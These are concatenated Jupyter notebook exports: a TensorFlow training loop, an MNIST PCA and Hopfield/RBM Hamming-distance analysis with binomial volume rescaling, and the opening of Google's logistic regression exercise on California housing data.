# or from files: dataset = tf.data.TextLineDataset(["file1.txt", "file2.txt"])
# details: https://www.tensorflow.org/api_docs/python/tf/data/Dataset
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
# Shuffle the samples and split them into batches
train_dataset = train_dataset.shuffle(buffer_size=1024).batch(BATCH_SIZE)
# + pycharm={"name": "#%%\n"}
print(train_dataset)
# + pycharm={"name": "#%%\n"}
# Training loop
for n in range(EPOCHS):
loss = 0
for x_batch, y_batch in train_dataset:
with tf.GradientTape() as tape:
f_loss = cross_entropy(y_batch, model_predict(x_batch))
loss += f_loss
grads = tape.gradient(f_loss, [layer_1.trainable_variables, layer_2.trainable_variables])
opt.apply_gradients(zip(grads[0], layer_1.trainable_variables))
opt.apply_gradients(zip(grads[1], layer_2.trainable_variables))
print(loss.numpy())
# + pycharm={"name": "#%%\n"}
y = model_predict(x_test)
y2 = tf.argmax(y, axis=1).numpy()
acc = len(y_test[y_test == y2]) / y_test.shape[0] * 100
print(acc)
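The accuracy computation above compares predicted and true labels element-wise; the same idea in a standalone form, with illustrative labels only:

```python
import numpy as np

def accuracy_percent(y_true, y_pred):
    """Percentage of positions where the predicted label matches the true one."""
    y_true = np.asarray(y_true)
    y_pred = np.asarray(y_pred)
    return float(np.mean(y_true == y_pred) * 100)

print(accuracy_percent([1, 2, 3, 4], [1, 2, 0, 4]))  # 75.0
```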
# + pycharm={"name": "#%%\n"}
| lab_2/1st_part/tf_test.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import numpy as np
from os import sep
from settings import DIR_DATA, DIR_OUTPUT, DIR_MODELS
from plotting import image_fancy
# -
# # Nov 10 - Build and save PCA on dataset
# +
import matplotlib.pyplot as plt
import numpy as np
from sklearn.decomposition import PCA
from data_process import data_mnist, binarize_image_data, image_data_collapse
from settings import MNIST_BINARIZATION_CUTOFF
TRAINING, TESTING = data_mnist(binarize=True)
num_features = TRAINING[0][0].shape[0] ** 2
num_samples = len(TRAINING)
def PCA_on_dataset(num_samples, num_features, dataset=None, binarize=True, X=None):
def get_X(dataset):
X = np.zeros((len(dataset), num_features))
for idx, pair in enumerate(dataset):
elem_arr, elem_label = pair
preprocessed_input = image_data_collapse(elem_arr)
#if binarize:
# preprocessed_input = binarize_image_data(preprocessed_input, threshold=MNIST_BINARIZATION_CUTOFF)
features = preprocessed_input
X[idx, :] = features
return X
if X is None:
X = get_X(dataset)
pca = PCA(n_components=None, svd_solver='full')
pca.fit(X)
return pca
# -
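What `sklearn.decomposition.PCA` does under the hood can be sketched with an SVD on a small random matrix; each row of `Vt` plays the role of one row of `pca.components_`:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 4))         # rows = samples, columns = features
Xc = X - X.mean(axis=0)              # center each feature
U, S, Vt = np.linalg.svd(Xc, full_matrices=False)
components = Vt                      # each ROW is a principal direction
explained_var = S**2 / (len(X) - 1)  # variance captured by each direction
print(components.shape)  # (4, 4)
```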
pca = PCA_on_dataset(num_samples, num_features, dataset=TRAINING)
pca_weights = pca.components_ # each ROW of the pca weights is like a pattern
# SAVE (transposed version)
fpath = DIR_MODELS + sep + 'pca_binarized_raw.npz'
np.savez(fpath, pca_weights=pca_weights.T)
# LOAD
with open(fpath, 'rb') as f:
pca_weights = np.load(f)['pca_weights']
print(pca_weights)
print(pca_weights.shape)
for idx in range(2):
plt.imshow(pca_weights[:, idx].reshape(28,28))
plt.show()
a = pca_weights.reshape(28,28,-1)
print(pca_weights.shape)
print(a.shape)
for idx in range(2):
plt.imshow(a[:, :, idx])
plt.show()
# +
from RBM_train import load_rbm_hopfield
k_pattern = 12
fname = 'hopfield_mnist_%d0_PCA.npz' % k_pattern
rbm = load_rbm_hopfield(npzpath=DIR_MODELS + sep + 'saved' + sep + fname)
# -
rbm_weights = rbm.internal_weights
print(rbm_weights.shape)
for idx in range(2):
plt.imshow(rbm_weights[:, idx].reshape(28,28))
plt.show()
# # Nov 13 - For each digit (so 10x) Build and save PCA on dataset
# +
from data_process import data_dict_mnist
# data_dict has the form:
# data_dict[0] = 28 x 28 x n0 of n0 '0' samples
# data_dict[4] = 28 x 28 x n4 of n4 '4' samples
data_dict, category_counts = data_dict_mnist(TRAINING)
for idx in range(10):
X = data_dict[idx].reshape((28**2, -1)).transpose()
print(X.shape)
num_samples = X.shape[0]
num_features = X.shape[1]
pca = PCA_on_dataset(num_samples, num_features, dataset=None, binarize=True, X=X)
pca_weights = pca.components_ # each ROW of the pca weights is like a pattern
# SAVE (transposed version)
fpath = DIR_MODELS + sep + 'pca_binarized_raw_digit%d.npz' % idx
np.savez(fpath, pca_weights=pca_weights.T)
# +
# LOAD
fpath = DIR_MODELS + sep + 'pca_binarized_raw_digit7.npz'
with open(fpath, 'rb') as f:
pca_weights = np.load(f)['pca_weights']
print(pca_weights)
print(pca_weights.shape)
for idx in range(2):
plt.imshow(pca_weights[:, idx].reshape(28,28))
plt.colorbar()
plt.show()
a = pca_weights.reshape(28,28,-1)
print(pca_weights.shape)
print(a.shape)
for idx in range(2):
plt.imshow(a[:, :, idx])
plt.show()
# -
# # Inspect models/poe npz files
DIR_POE = 'models' + sep + 'poe'
fpath = DIR_POE + sep + 'hopfield_digit3_p1000_1000_pca.npz'
with open(fpath, 'rb') as f:
fcontents = np.load(f)
print(fcontents.files)
weights = fcontents['Q']
for idx in range(3):
plt.imshow(weights[:, idx].reshape(28, 28))
plt.show()
# # Nov 15 - Distribution of images in the dataset
# +
from data_process import data_dict_mnist
from RBM_train import load_rbm_hopfield
# data_dict has the form:
# data_dict[0] = 28 x 28 x n0 of n0 '0' samples
# data_dict[4] = 28 x 28 x n4 of n4 '4' samples
data_dict, category_counts = data_dict_mnist(TRAINING)
# -
# load 10 target patterns
k_choice = 1
p = k_choice * 10
N = 28**2
fname = 'hopfield_mnist_%d0%s.npz' % (k_choice, '_hebbian')
rbm_hebbian = load_rbm_hopfield(npzpath='models' + sep + 'saved' + sep + fname)
weights_hebbian = rbm_hebbian.internal_weights
XI = weights_hebbian
PATTERNS = weights_hebbian * np.sqrt(N)
for mu in range(p):
pattern_mu = PATTERNS[:, mu]  # PATTERNS is already scaled by sqrt(N) above
#plt.figure(figsize=(2,12))
plt.imshow(pattern_mu.reshape(28,28), interpolation='None')
plt.colorbar()
plt.show()
# +
# PLAN: for each class
# 1) look at all data from the class
# 2) look at hamming distance of each digit from the class (max 28^2=784)
# 3) ...
def hamming_distance(x, y):
prod = x * y
dist = 0.5 * np.sum(1 - prod)
return dist
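As a quick sanity check of the ±1 spin convention behind `hamming_distance`, a toy example (the vectors here are invented for illustration, not MNIST data):

```python
import numpy as np

# For spins in {-1, +1}, x * y is +1 where the entries agree and -1 where
# they differ, so 0.5 * sum(1 - x*y) counts the number of mismatched sites.
x = np.array([1, 1, -1, -1])
y = np.array([1, -1, -1, 1])
dist = 0.5 * np.sum(1 - x * y)
print(dist)  # 2.0: the vectors differ at indices 1 and 3
```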
def build_Jij(patterns):
# TODO remove self-interactions? no RBM has them
A = np.dot(patterns.T, patterns)
A_inv = np.linalg.inv(A)
Jij = np.dot(patterns,
np.dot(A_inv, patterns.T))
return Jij
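`build_Jij` is the projection (pseudo-inverse) rule: $J = X (X^T X)^{-1} X^T$ is a projector onto the span of the stored patterns, so each stored pattern is an exact fixed point of $J$. A minimal sketch with hypothetical toy patterns (not the MNIST patterns):

```python
import numpy as np

# Three mutually orthogonal +/-1 patterns over N=4 sites (columns).
patterns = np.array([[1, 1, 1],
                     [1, 1, -1],
                     [1, -1, 1],
                     [1, -1, -1]], dtype=float)
A = patterns.T @ patterns                    # overlap matrix (here 4*I)
J = patterns @ np.linalg.inv(A) @ patterns.T # projection-rule couplings
print(np.allclose(J @ patterns, patterns))   # True: patterns are fixed points of J
```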
J_INTXN = build_Jij(PATTERNS)
def energy_fn(state_vector):
scaled_energy = -0.5 * np.dot(state_vector,
np.dot(J_INTXN, state_vector))
return scaled_energy
def get_hamming_histogram(X, target_state):
# given matrix of states, compute distance to the target state for all
# plot the histogram
if len(X.shape) == 3:
assert X.shape[0] == 28 and X.shape[1] == 28
X = X.reshape(28**2, -1)
num_pts = X.shape[-1]
dists = np.zeros(num_pts)
for idx in range(num_pts):
dists[idx] = hamming_distance(X[:, idx], target_state)
return dists
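The per-sample loop above can also be vectorized: with `X` of shape `(N, num_pts)` and a length-`N` target, all Hamming distances come from a single broadcasted product. A sketch on random toy data (not the MNIST arrays):

```python
import numpy as np

rng = np.random.default_rng(1)
X = rng.choice([-1.0, 1.0], size=(8, 5))      # 8 sites, 5 samples
target = rng.choice([-1.0, 1.0], size=8)

# Broadcast target against every column of X at once.
dists_vec = 0.5 * np.sum(1 - X * target[:, None], axis=0)
dists_loop = np.array([0.5 * np.sum(1 - X[:, i] * target) for i in range(5)])
print(np.allclose(dists_vec, dists_loop))  # True
```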
def get_energy_histogram(X, target_state):
# given matrix of states, compute distance to the target state for all
# plot the histogram
if len(X.shape) == 3:
assert X.shape[0] == 28 and X.shape[1] == 28
X = X.reshape(28**2, -1)
num_pts = X.shape[-1]
energies = np.zeros(num_pts)
for idx in range(num_pts):
energies[idx] = energy_fn(X[:, idx])
return energies
# -
# Gather data
# +
#for idx in range(10):
list_of_dists = []
list_of_energies = []
BETA = 2.0
# pick get_hamming_histogram OR get_energy_histogram
hist_fn = get_energy_histogram
for mu in range(p):
target_state = PATTERNS[:, mu]
dists_mu = get_hamming_histogram(data_dict[mu], target_state)
print('class %d: min dist = %d, max dist = %d' % (mu, min(dists_mu), max(dists_mu)))
list_of_dists.append(dists_mu)
energies_mu = get_energy_histogram(data_dict[mu], target_state)
list_of_energies.append(energies_mu)
#boltz_mu = np.exp(- BETA * energies_mu)
#list_of_boltz.append(boltz_mu)
# -
# Plot data
# +
outdir = 'output' + sep + 'ICLR_nb'
D_RANGE = (0,250)
E_RANGE = (-0.5 * 28**2, -100)
#B_RANGE =
for mu in range(p):
dists_by_mu = list_of_dists[mu]
energies_by_mu = list_of_energies[mu]
#boltz_by_mu = list_of_boltz[mu]
n, bins, _ = plt.hist(dists_by_mu, range=D_RANGE, bins=50, density=True)
plt.title('hamming distances (pattern: %d)' % mu)
plt.savefig(outdir + sep + 'dist_hist_mu%d.jpg' % mu)
plt.close()
plt.hist(energies_by_mu, range=E_RANGE, bins=50, density=True)
plt.title('energies (pattern: %d)' % mu)
plt.axvline(x=-0.5 * 28**2)
plt.savefig(outdir + sep + 'energy_hist_mu%d.jpg' % mu)
plt.close()
scale_factors = np.array([rescaler(i) for i in bins[:-1]])  # NOTE: rescaler is assumed to be defined in an earlier cell
counts, bins = np.histogram(dists_by_mu, bins=50)
plt.hist(bins[:-1], bins, weights=scale_factors * counts)
#plt.hist(dists_by_mu, range=E_RANGE, bins=bins, density=True, weights=scale_factors)
plt.title('scaled dists (pattern: %d)' % mu)
#plt.axvline(x=-0.5 * 28**2)
plt.savefig(outdir + sep + 'scaled_dists_hist_mu%d.jpg' % mu)
plt.close()
#plt.hist(boltz_by_mu, bins=50, density=True)
#plt.title('boltzmann weights (pattern: %d)' % mu)
#plt.savefig(outdir + sep + 'boltz_hist_mu%d.jpg' % mu)
#plt.close()
# +
idx_a = 7
idx_b = 12
print(data_dict[1].shape)
x1 = data_dict[1][:,:,idx_a].reshape(28**2)
x2 = data_dict[1][:,:,idx_b].reshape(28**2)
plt.imshow(data_dict[1][:,:,idx_a])
plt.show()
plt.imshow(data_dict[1][:,:,idx_b])
plt.show()
hd = np.sum(1 - x1 * x2) * 0.5
print(hd)
# -
# # (Nov 16, 2020) Distance distribution rescaled by hamming shell area
# We want to rescale the observed distance distribution of the data by the 'volume' of states in the $2^N$ state space.
# The number of states a distance d away from a given state is:
# $\displaystyle n(d) = {N \choose d}$
# e.g. $n(0)=1, n(1)=N=784, n(2)=N(N-1)/2 = 306936, ... , n(N)=1$.
#
# Note that: $n!=\Gamma(n+1)$
#
# The (uniform) probability to be a distance $d$ away is then: $p(d) = 2^{-N} n(d)$
# +
N0 = 28**2
from scipy.special import gamma, loggamma
def N_choose_k(N, k):
num = gamma(N+1)
den = gamma(N - k + 1) * gamma(k+1)
return num / den
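As a sanity check of the Gamma-function binomial, a stdlib sketch (using `math.gamma` in place of `scipy.special.gamma`): since $n! = \Gamma(n+1)$, the ratio reproduces $\binom{N}{k}$ exactly for small arguments. For $N = 784$, $\Gamma(785)$ overflows a double, which is why the notebook switches to log space with `loggamma` below.

```python
import math

def n_choose_k_gamma(N, k):
    # N choose k via the Gamma function: n! = Gamma(n + 1)
    return math.gamma(N + 1) / (math.gamma(N - k + 1) * math.gamma(k + 1))

print(n_choose_k_gamma(10, 3), math.comb(10, 3))  # 120.0 120
```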
def log_uniform_dist_prob(d, N=N0):
scale = -N *np.log(2)
num = loggamma(N+1)
den = loggamma(N - d + 1) + loggamma(d+1)
return scale + num - den
print('Example probabilities (log, direct):')
p0 = log_uniform_dist_prob(0, N=784)
p1 = log_uniform_dist_prob(1, N=784)
p2 = log_uniform_dist_prob(2, N=784)
print('d=0', p0, np.exp(p0))
print('d=1', p1, np.exp(p1))
print('d=2', p2, np.exp(p2))
d_arr = np.arange(N+1)
logp_arr = log_uniform_dist_prob(d_arr)
plt.plot(d_arr, logp_arr)
plt.xlabel(r'$\textrm{distance}$')
plt.ylabel(r'$\log p(d)$')
plt.show(); plt.close()
d_arr = np.arange(0,N+1)
p_arr = np.exp(log_uniform_dist_prob(d_arr))
plt.plot(d_arr, p_arr)
plt.xlabel(r'$\textrm{distance}$')
plt.ylabel(r'$p(d)$')
plt.show(); plt.close()
# -
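Since $p(d) = 2^{-N}\binom{N}{d}$ is a normalized binomial distribution, the log-space implementation can be checked by summing it back to $1$; a self-contained stdlib version of the same formula:

```python
import math

# Uniform distance probabilities p(d) = 2^{-N} * C(N, d) must sum to 1
# over d = 0..N (binomial theorem); here for N = 784 via lgamma.
N = 784
logp = [(-N * math.log(2)) + math.lgamma(N + 1)
        - math.lgamma(N - d + 1) - math.lgamma(d + 1)
        for d in range(N + 1)]
total = sum(math.exp(v) for v in logp)
print(round(total, 6))  # 1.0
```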
# We observe some data distribution $p_{data}^{(\mu)}(d)=$ "probability that sample $\mu$-images are a distance $d$ from pattern $\mu$". Here is $\log p(d)$ for $\mu=1$.
for mu in [1]:
dists_by_mu = list_of_dists[mu]
energies_by_mu = list_of_energies[mu]
#boltz_by_mu = list_of_boltz[mu]
n, bins, _ = plt.hist(dists_by_mu, range=(0,250), bins=50, density=True)
plt.title('hamming distances (pattern: %d)' % mu)
plt.show(); plt.close()
# Consider rescaling this observed distribution by $p(d)$, the unbiased probability of being a distance $d$ away.
#
# Define $g_{data}^{(\mu)}(d) \equiv p_{data}^{(\mu)}(d) / p(d)$.
#
# For re-weighting the binning, we need to sum over all the distances in each bin. For example, suppose bin $i$ represents distance $0, 1, 2$. The "volume" of states is then:
#
# $v(b_i) = n(0) + n(1) + n(2)$
#
# Then for the corresponding $p(d)$ bin $b_i$,
#
# $g_{data}^{(\mu)}(b_i) \equiv 2^N p_{data}^{(\mu)}(b_i) / (n(0) + n(1) + n(2))$
#
# And its $\log$,
#
# $\log g_{data}^{(\mu)}(b_i) \equiv N \log 2 + \log p_{data}^{(\mu)}(b_i) - \log (n(0) + n(1) + n(2))$
#
# The final term is the $\log$ of a partial sum of binomial coefficients, which has no closed form.
# Indirectly discussed on p102 of https://www.math.upenn.edu/~wilf/AeqB.pdf. Bottom of p160 is our quantity of interest. Relevant links
#
# - https://mathoverflow.net/questions/17202/sum-of-the-first-k-binomial-coefficients-for-fixed-n
# - https://math.stackexchange.com/questions/103280/asymptotics-for-a-partial-sum-of-binomial-coefficients
# - https://mathoverflow.net/questions/261428/approximation-of-sum-of-the-first-binomial-coefficients-for-fixed-n?noredirect=1&lq=1
#
# I will try the upper and lower bounds from the last link.
# +
outdir = 'output' + sep + 'ICLR_nb'
D_RANGE = (0,250)
E_RANGE = (-0.5 * 28**2, -100)
def build_bins(dmin, dmax, nn):
# return nn+1 bin edges, for the nn bins
gap = (dmax - dmin) / float(nn)
return np.arange(dmin, dmax + 1e-5, gap)
def H_fn(x):
return -x * np.log2(x) - (1-x) * np.log2(1-x)
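`H_fn` is the binary entropy, and the bound used below is $\sum_{k=0}^{r}\binom{N}{k} \le 2^{N H(r/N)}$ for $r \le N/2$. A small-$N$ check of this inequality (with hypothetical $N=20$, not the $N=784$ case; note $H$ is undefined at $x=0$ and $x=1$, so $d=0$ needs separate handling):

```python
import math

def H(x):
    # binary entropy in bits, valid for 0 < x < 1
    return -x * math.log2(x) - (1 - x) * math.log2(1 - x)

N_small, r = 20, 5
exact = sum(math.comb(N_small, k) for k in range(r + 1))  # 21700
bound = 2 ** (N_small * H(r / N_small))
print(exact, bound > exact)  # 21700 True
```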
def log_volume_per_bin(bins, upper=True):
# NOTE: the bounds are only valid for d <= N/2
# assumes the right edge of each bin is inclusive (i.e. [0, 10] means [0, 10+eps])
# TODO handle logs carefully; as initially written the bound itself is NOT computed in log space
nn = len(bins) - 1
def upper_bound(r):
# partial sum of binomial coefficients (N choose k) from k=0 to k=r
# see https://mathoverflow.net/questions/261428/approximation-of-sum-of-the-first-binomial-coefficients-for-fixed-n?noredirect=1&lq=1
# see also Michael Lugo: https://mathoverflow.net/questions/17202/sum-of-the-first-k-binomial-coefficients-for-fixed-n
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
def lower_bound(r):
num = upper_bound(r)
den = np.sqrt(8 * r * (1 - float(r) / N0))
return num/den
if upper:
bound = upper_bound
else:
bound = lower_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_bin = np.zeros(nn)
for idx in range(nn):
bin_left = int(bins[idx])
bin_right = int(bins[idx + 1])
approx_cumsum[idx] = bound(bin_right)
approx_vol_per_bin[0] = approx_cumsum[0]
for idx in range(1, nn):
approx_vol_per_bin[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
log_approx_volume_per_bin = np.log(approx_vol_per_bin)
return log_approx_volume_per_bin
NUM_BINS = 25
assert (D_RANGE[1] - D_RANGE[0]) % NUM_BINS == 0
GAP = (D_RANGE[1] - D_RANGE[0]) / NUM_BINS
BINS = build_bins(D_RANGE[0], D_RANGE[1], NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS)]
print(BINS)
# scale the normed counts by the distance
approxUpper_log_vol_per_bin_arr = log_volume_per_bin(BINS, upper=True)
approxLower_log_vol_per_bin_arr = log_volume_per_bin(BINS, upper=False)
for mu in range(p):
counts, bins = np.histogram(list_of_dists[mu], bins=BINS)
# Plot p_data(d)
normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True)
plt.title(r'$p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'normed_dists_hist_mu%d.jpg' % mu)
plt.close()
# Plot log p_data(d)
log_normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True, log=True)
plt.title(r'$\log p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
#scaled_log_normed_counts = ...
print(len(normed_counts), normed_counts.shape)
print(len(bins[:-1]), bins.shape)
scaled_appxUpper_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxUpper_log_vol_per_bin_arr
scaled_appxLower_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxLower_log_vol_per_bin_arr
# Plot log g_data(d), upper and lower bound versions
plt.bar(BINS_MIDPTS, scaled_appxUpper_log_normed_counts, color='#2A63B1', width=GAP)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'scaled_appxUpper_log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
plt.bar(BINS_MIDPTS, scaled_appxLower_log_normed_counts, color='#2A63B1', width=GAP)
plt.title(r'$\log g_{data}(d)$ (lower; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'scaled_appxLower_log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
# -
# Troubleshooting NaN: use the whole distance range, 0 to 784, split into fixed-size bins.
#
# Add a function that computes, for each distance, the volume / log volume (log is more numerically stable); binning can be done later.
# +
N = 28**2
D_RANGE = (0,N)
NUM_BINS = N + 1  # one bin per distance (alternatively, 28 coarse bins)
if NUM_BINS == N+1:
GAP = 1
BINS = np.arange(NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS-1)]
else:
assert (D_RANGE[1] - D_RANGE[0]) % NUM_BINS == 0
GAP = (D_RANGE[1] - D_RANGE[0]) / NUM_BINS
BINS = build_bins(D_RANGE[0], D_RANGE[1], NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS)]
#print(BINS)
def log_volume_per_dist(dists, upper=True):
assert len(dists) == N + 1
nn = len(dists)
def upper_bound(r):
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
def lower_bound(r):
num = upper_bound(r)
den = np.sqrt(8 * r * (1 - float(r) / N0))
return num/den
if upper:
bound = upper_bound
else:
bound = lower_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_dist = np.zeros(nn)
# we know the first cumulative value is 1 and the last is 2^N
approx_cumsum[0] = 1
approx_cumsum[N] = 2**N
# use symmetry wrt midpoint N/2.0
assert N % 2 == 0
midpt = int(N / 2)
for idx in range(1, midpt + 1):
idx_reflect = N - idx
approx_cumsum[idx] = bound(idx)
approx_cumsum[idx_reflect] = approx_cumsum[N] - approx_cumsum[idx]
#print('loop1_cumsum', idx, approx_cumsum[idx], idx_reflect, approx_cumsum[idx_reflect])
approx_vol_per_dist[0] = approx_cumsum[0]
approx_vol_per_dist[N] = 1.0
for idx in range(1, midpt + 1):
idx_reflect = N - idx
approx_vol_per_dist[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
approx_vol_per_dist[idx_reflect] = approx_vol_per_dist[idx]
#print('log_volume_per_dist', idx, idx_reflect, approx_vol_per_dist[idx], approx_vol_per_dist[idx])
log_approx_volume_per_dist = np.log(approx_vol_per_dist)
#print('log_approx_volume_per_dist')
#print(log_approx_volume_per_dist)
return log_approx_volume_per_dist, approx_vol_per_dist, approx_cumsum
def log_volume_per_bin(bins):
nn = len(bins) - 1
def upper_bound(r):
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
bound = upper_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_bin = np.zeros(nn)
for idx in range(nn):
bin_left = int(bins[idx])
bin_right = int(bins[idx + 1])
approx_cumsum[idx] = bound(bin_right)
print('loop1_cumsum', idx, bin_right, approx_cumsum[idx])
approx_vol_per_bin[0] = approx_cumsum[0]
for idx in range(1, nn):
approx_vol_per_bin[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
print('log_volume_per_bin', idx, approx_vol_per_bin[idx], approx_cumsum[idx])
log_approx_volume_per_bin = np.log(approx_vol_per_bin)
print('log_approx_volume_per_bin')
print(log_approx_volume_per_bin)
return log_approx_volume_per_bin
# scale the normed counts by the distance
if NUM_BINS == N + 1:
approxUpper_log_vol_per_bin_arr, approx_vol_per_dist, approx_cumsum = log_volume_per_dist(BINS, upper=True)
approxLower_log_vol_per_bin_arr, approx_vol_per_dist, approx_cumsum = log_volume_per_dist(BINS, upper=False)
else:
approxUpper_log_vol_per_bin_arr = log_volume_per_bin(BINS)
for mu in [1]:
counts, bins = np.histogram(list_of_dists[mu], bins=np.arange(N+2))  # N+2 edges so each distance 0..N gets its own bin
print('len(counts), len(bins)')
print(len(counts), len(bins))
normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True)
plt.close()
# Plot p_data(d)
plt.bar(BINS, normed_counts, color='red', width=0.8, linewidth=0)
plt.title(r'$p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_p_dists_hist_mu%d.pdf' % mu)
plt.close()
# Plot log p_data(d)
plt.bar(BINS, np.log(normed_counts), color='red', width=0.8, linewidth=0)
plt.title(r'$\log p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_logp_dists_hist_mu%d.pdf' % mu)
plt.close()
#scaled_log_normed_counts = ...
print(len(normed_counts), normed_counts.shape)
print(len(bins[:-1]), bins.shape)
scaled_appxUpper_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxUpper_log_vol_per_bin_arr
scaled_appxLower_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxLower_log_vol_per_bin_arr
print('bins_right')
print(bins[1:])
print('normed_counts')
print(normed_counts)
print('approxUpper_log_vol_per_bin_arr')
print(approxUpper_log_vol_per_bin_arr)
print('scaled_appxUpper_log_normed_counts')
print(scaled_appxUpper_log_normed_counts)
# Plot log g_data(d), upper and lower bound versions
plt.bar(BINS, scaled_appxUpper_log_normed_counts, color='#2A63B1', width=0.8, linewidth=0)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
#plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlim(0,100)
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxUpper_log_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
plt.bar(BINS, scaled_appxLower_log_normed_counts, color='#2A63B1', width=0.8, linewidth=0)
plt.title(r'$\log g_{data}(d)$ (lower; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxLower_log_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
plt.bar(BINS, np.exp(scaled_appxLower_log_normed_counts), color='green', width=0.8, linewidth=0)
plt.title(r'$g_{data}(d)$ (lower; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxLower_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
# +
plt.plot(range(784+1), approxUpper_log_vol_per_bin_arr - N*np.log(2))
plt.show(); plt.close()
plt.plot(range(784+1), N*np.log(2) - approxUpper_log_vol_per_bin_arr)
plt.show(); plt.close()
# -
print(counts)
# +
a = np.array([[1,3,4],[1,3,4]])
scales = np.array([2,1,2])
print (a / scales)
# -
print(scales > 1)
# + [markdown] colab_type="text" id="copyright-notice"
# #### Copyright 2017 Google LLC.
# + cellView="both" colab={} colab_type="code" id="copyright-notice2"
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="g4T-_IsVbweU"
# # Logistic Regression
# + [markdown] colab_type="text" id="LEAHZv4rIYHX"
# **Learning Objectives:**
# * Reframe the median house value predictor (from the preceding exercises) as a binary classification model
# * Compare the effectiveness of logistic regression vs. linear regression for a binary classification problem
# + [markdown] colab_type="text" id="CnkCZqdIIYHY"
# As in the preceding exercises, we'll work with the California housing data set, but this time we'll turn it into a binary classification problem by predicting whether a city block is a high-cost city block. We'll also revert to the default features for now.
# + [markdown] colab_type="text" id="9pltCyy2K3dd"
# ## Frame the problem as binary classification
#
# The target of our data set is `median_house_value`, which is a numeric (continuous-valued) feature. We can create a boolean label by applying a threshold to this continuous value.
#
# Given features describing a city block, we wish to predict whether it is a high-cost city block. To prepare the targets for training and evaluation, we define a classification threshold on the median house value: the 75th percentile (about 265000). All house values above the threshold are labeled `1`, and all others are labeled `0`.
# + [markdown] colab_type="text" id="67IJwZX1Vvjt"
# ## Setup
#
# Run the cells below to load the data and prepare the input features and targets.
# + colab={} colab_type="code" id="fOlbcJ4EIYHd"
from __future__ import print_function
import math
from IPython import display
from matplotlib import cm
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
import tensorflow as tf
from tensorflow.python.data import Dataset
tf.logging.set_verbosity(tf.logging.ERROR)
pd.options.display.max_rows = 10
pd.options.display.float_format = '{:.1f}'.format
california_housing_dataframe = pd.read_csv("https://download.mlcc.google.cn/mledu-datasets/california_housing_train.csv", sep=",")
california_housing_dataframe = california_housing_dataframe.reindex(
np.random.permutation(california_housing_dataframe.index))
# + [markdown] colab_type="text" id="lTB73MNeIYHf"
# Note how the code below differs slightly from the previous exercises. Instead of using `median_house_value` as the target, we create a new binary target, `median_house_value_is_high`.
# + colab={} colab_type="code" id="kPSqspaqIYHg"
def preprocess_features(california_housing_dataframe):
"""Prepares input features from California housing data set.
Args:
california_housing_dataframe: A Pandas DataFrame expected to contain data
from the California housing data set.
Returns:
